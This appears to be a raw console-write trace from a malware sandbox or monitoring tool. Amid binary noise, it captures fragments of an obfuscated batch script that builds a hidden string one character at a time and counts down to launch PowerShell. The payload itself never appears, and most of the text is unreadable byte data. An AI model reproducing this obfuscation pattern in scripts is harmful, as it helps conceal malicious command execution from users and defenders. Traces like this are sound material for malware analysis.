Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....'...........................'........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.9.7. .E.Q.U. .0. ..'..............................\....'................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..'....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....'..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....'..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....'............................2..@..`.2.(.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.9.6.,.1.!. ...............2..@..`.2.(.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....'..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....'...........................'........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.9.6. .E.Q.U. .0. ..'..............................\....'................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..'....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....'..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....'..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J0.2.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....'............................2..@..`.2.@.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.9.5.,.1.!. ...............2..@..`.2.@.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....(..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....(...........................(........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.9.5. .E.Q.U. .0. ..(..............................\....(................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..(....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...&(..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...-(..........................s.k.t.o.p.>.@..J0.2.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...9(............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.9.4.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...E(..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...K(..........................E(........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.9.4. .E.Q.U. .0. .Q(..............................\...K(................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.W(....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...c(..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...j(...........................?4...0..?4.......4...0...o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...v(............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.9.3.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....(..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....(...........................(........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.9.3. .E.Q.U. .0. ..(..............................\....(................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..(....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....(..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....(..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....(............................2..@..`.2.(.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.9.2.,.1.!. ...............2..@..`.2.(.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....(..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....(...........................(........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.9.2. .E.Q.U. .0. ..(..............................\....(................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..(....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....(..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....(..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J .3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....(............................2..@..`.2.(.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.9.1.,.1.!. ...............2..@..`.2.(.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....(..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....)...........................(........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.9.1. .E.Q.U. .0. ..)..............................\....)................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..)....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....)..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...!)..........................s.k.t.o.p.>.@..J .3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...-)............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.9.0.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...9)..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...?)..........................9)........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.9.0. .E.Q.U. .0. .E)..............................\...?)................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.K)....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...W)..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...^)..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J$.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...j)............................2..@..`.2.@.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.8.9.,.1.!. ...............2..@..`.2.@.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...v)..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...\|)..........................v)........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.8.9. .E.Q.U. .0. ..)..............................\...\|)................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..)....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....)..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....)..........................s.k.t.o.p.>.@..J$.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....)............................2..@..`.2.H.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.8.8.,.1.!. ...............2..@..`.2.H.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....)..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....)...........................)........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.8.8. .E.Q.U. .0. ..)..............................\....)................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..)....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....)..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....)..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....)............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.8.7.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....)..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....)...........................)........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.8.7. .E.Q.U. .0. ..)..............................\....)................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..*....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....*..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....*..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...!............................2..@..`.2...3.`...`.....u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.8.6.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...-*..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...3..........................-........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.8.6. .E.Q.U. .0. .:..............................\...3................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.@*....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...L*..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...S*..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J,.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\..._............................2..@..`.2.X.3.`...`.....u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.8.5.,.1.!. ...............2..@..`.2.X.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...k*..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...q..........................k........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.8.5. .E.Q.U. .0. .w..............................\...q................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.}*....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....*..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....*..........................s.k.t.o.p.>.@..J,.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\................................2..@..`.2.X.3.`...`.....u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.8.4.,.1.!. ...............2..@..`.2.X.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....*..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\.......................................................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.8.4. .E.Q.U. .0. ................................\....................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..*....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....*..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....*..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\................................2..@..`.2.8.3.`...`.....u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.8.3.,.1.!. ...............2..@..`.2.8.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....*..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\.......................................................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.8.3. .E.Q.U. .0. ................................\....................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..*....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....+..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....+..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....+............................2..@..`.2. .3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.8.2.,.1.!. ...............2..@..`.2. .3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\..."+..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...(+.........................."+........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.8.2. .E.Q.U. .0. ..+..............................\...(+................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.4+....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...@+..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...G+..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J4.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...S+............................2..@..`.2.p.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.8.1.,.1.!. ...............2..@..`.2.p.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\..._+..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...e+.........................._+........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.8.1. .E.Q.U. .0. .k+..............................\...e+................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.q+....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...}+..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....+..........................s.k.t.o.p.>.@..J4.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J>.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....+............................2..@..`.2.h.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.8.0.,.1.!. ...............2..@..`.2.h.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....+..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....+...........................+........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.8.0. .E.Q.U. .0. ..+..............................\....+................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..+....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....+..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....+..........................s.k.t.o.p.>.@..J>.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J8.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....+............................2..@..`.2.`.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.7.9.,.1.!. ...............2..@..`.2.`.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....+..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....+...........................+........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.7.9. .E.Q.U. .0. ..+..............................\....+................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..+....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....+..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....+..........................s.k.t.o.p.>.@..J8.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J2.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....,............................2..@..`.2.`.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.7.8.,.1.!. ...............2..@..`.2.`.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....,..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....,...........................,........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.7.8. .E.Q.U. .0. .",..............................\....,................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.(,....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...4,..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...;,..........................s.k.t.o.p.>.@..J2.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J<.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...G,............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.7.7.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...S,..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...Y,..........................S,........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.7.7. .E.Q.U. .0. ._,..............................\...Y,................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.e,....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...q,..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...x,..........................s.k.t.o.p.>.@..J<.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..JN.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....,............................2..@..`.2.x.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.7.6.,.1.!. ...............2..@..`.2.x.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....,..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....,...........................,........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.7.6. .E.Q.U. .0. ..,..............................\....,................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..,....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....,..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....,..........................s.k.t.o.p.>.@..JN.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J`.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....,............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.7.5.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....,..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....,...........................,........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.7.5. .E.Q.U. .0. ..,..............................\....,................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..,....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....,..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....,..........................s.k.t.o.p.>.@..J`.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..Jr.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....,............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.7.4.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....-..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....-...........................-........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.7.4. .E.Q.U. .0. ..-..............................\....-................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..-....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...(-..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\.../-..........................s.k.t.o.p.>.@..Jr.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..JD.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...;-............................2..@..`.2...3.`...`.....*u..2.........9..9........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.7.3.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...G-..................................,.................o.4............F.J........
